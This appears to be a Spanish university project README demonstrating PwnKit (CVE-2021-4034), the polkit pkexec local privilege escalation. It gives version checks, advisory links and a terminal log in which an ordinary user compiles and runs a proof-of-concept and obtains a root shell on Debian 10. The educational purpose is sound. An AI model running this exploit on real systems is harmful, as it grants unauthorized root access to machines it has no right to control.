
Curso universitario de Vulnerabilidades de Software y mitigación, para mostrar la explotación y la remediación causadas por esta vulnerabilidad.
Proyecto universitario de vulnerabilidades de software y mitigación, para mostrar la explotación y la remediación causadas por esta vulnerabilidad. Usamos para este experimento Ubunto versión 16.04 LTS, así como Debian 10.1.0, lo cual se mostrará en el experimento. La configuración del entorno era esencial, ya que siempre necesitas verificar la versión en la que trabajas para asegurarte de si es vulnerable o no. comandos de comprobación utilizados: dpkg -l | grep polkit, pkexec --version
PoC para PwnKit: Vulnerabilidad de escalada local de privilegios en pkexec de polkit (CVE-2021-4034)
https://seclists.org/oss-sec/2022/q1/80
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
Verificado en Debian 10 y Ubunto 16.0.4
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)